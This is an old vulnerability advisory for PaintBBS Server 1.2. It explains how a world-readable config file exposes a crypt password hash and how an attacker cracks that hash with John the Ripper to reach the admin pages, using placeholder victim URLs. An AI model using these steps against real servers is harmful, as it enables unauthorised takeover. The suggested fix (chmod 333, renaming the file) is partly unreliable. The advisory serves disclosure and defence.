PaintBBS Server v1.2 Advisory
Author: John Bissell A.K.A. HighT1mes
Vulnerable: PaintBBS Server Ver.1.2 Build 010514
Impact: PaintBBS Server 0wn3d
Release Date: January, 22, 2002
Contact: blumorpho@cox.net
Vendor Homepage:
http://www.ax.sakura.ne.jp/~aotama/
---------------------------------------------------------------------
---------------------
Introduction:
PaintBBS Server v.1.2 is a cool WWW app
that allows people to draw pictures as well
leave messages like a normal BBS. A few days ago I
learned about this app and decided to
test some of it's security for fun. Since the
documentation is in Japanese it took a little
time to figure out what files did what. The main file to
be aware of is oekakibbs.conf.
Anyone can read this file by default and it contains
the encrypted password to the PaintBBS
Server. The other problem is that the permissions of
the /oekaki/ folder is 777 allowing
all hell to break loose by anyone. So if I don't know
what the .conf file is named I can
go to that folder from a web browser and see.
I haven't tested any other version of this
software yet. PaintBBS Server is
actually up to v2.40. So if anyone wants to continue
the investigation have fun! :p
Problem Description:
This is one of those default configuration
problems. A malicious person
can read the oekaki config file from the web then find
the encrypted password then
crack it. Thus giving them admin access to the
server.
As an example if I wanted to remotely take
over
http://www.victim.com/oetaki/oetaki.cgi I would first
go to the config file located in the
/oetaki/ dir by default at
http://www.victim.com/oetaki/oekakibbs.conf. If that
didn't work
then I could set my web browser to the /oetaki/
folder then see what the .conf files are
named and access them. Once I could view the
config file I would see something like this...
password=m8kl78sKTixvs
...
etc
Now that I have the encrypted password I
would take a standerd DES password
cracking program (I prefer John the Ripper) since
PaintBBS uses the crypt() function
and get the goods. If you use John the Ripper put the
encrypted password into a
unix type /etc/passwd.txt file format and run John.
Now that I have the cracked password then
I would go over to one of the
following admin url's to have some fun..
http://www.victim.com/oekaki/oekaki.cgi?
mode=administration
http://www.victim.com/oekaki/oekaki.cgi?
mode=deleteUserCommentView
Solution:
To solve this security problem first you
should change the /oekaki/ folder from
777 to something more secure like 333 using the
chmod command. Next you will want to rename
the oekakibbs.conf file so no one can get easy
access to that file. If you have the right
web server you should also change the permissions
of the file so not everyone can read it.
Have a good day!
---------------------------------------------------------------------
---------------------
Thank you to Chris_Judah and Hiroshi :)
